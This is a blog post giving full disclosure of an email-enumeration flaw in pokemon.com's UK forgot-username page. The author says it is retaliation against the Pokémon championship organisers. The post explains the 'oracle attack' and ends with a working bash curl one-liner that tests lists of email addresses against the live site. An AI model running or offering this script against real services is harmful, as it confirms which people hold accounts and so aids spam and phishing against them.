Pokemon.com has no respect for user’s personal data

Hello world!

Under normal circumstances I wouldn’t be going for a Full Disclosure but for something a bit more discrete like some proper e-mails to the webmaster. But the guys behind the UK Pokémon Video Game Championship have managed to show their stupidity with the events that followed the press coverage of certain incident in certain hotel by a certain person who is not necessarily the winner and they deserve a bit of “love” in exchange for that.

For me and for many of us the winner will still be RubeNCB92 no matter what disciplinary actions you have taken against him. And although I know that this action won’t restore him his place on the championship we hope that the reason this shitty organization has had to hide this shitty incident by removing his proper title from Ruben is that there is much more shit behind it that they don’t want journalists to find of which this is just a small piece.

So what’s that we have here? Well I usually call this an oracle attack, is a kind of attack where you use the answers given by a web page to check whether a particular information is or not into a database. In this case what we are checking is whether a set of e-mail addresses is or not inside the pokemon.com user database.

Why is it a serious vulnerability? Well amongst other reasons because it can be used by a spammer to know which of the addresses in his list are valid and which may not be, thus reinforcing spam campaigns against those. It can also be abused to obtain other background and personal information of the e-mail owner in this case interest in Pokémon which could be abused and worst of all, it can be used in phising attacks.

We are not anonymous, you can find us if you search a bit for us, and we haven’t done anything illegal since all the requests we have done to end up with this were legitimate since the fault is a design flaw and not a coding one. You could argue distributing the code below may be illegal but this depends on how you use it, we are distributing it in the hopes it helps people check if they are affected by this fault and won’t be responsible of any usage behind that.

The next line is a bash oneliner which will use curl and other standard Unix tools to check whether the e-mail addresses written as input are or not in pokemon.com’s users database in case they are the e-mail address is returned, in case they aren’t we return Failure. I hope this helps you know whether you are or not affected by the vulnerability.

while read email; do curl -s -o- https://www.pokemon.com/uk/account/forgot-username -d csrfmiddlewaretoken=c05b01dc738120000d338aac31de60b4 -d “email=$email” -b csrftoken=c05b01dc738120000d338aac31de60b4 -e https://www.pokemon.com/uk/account/forgot-username | fgrep “Unable to find an account using the provided information.” > /dev/null && echo Failure || echo “$email”; done

With love,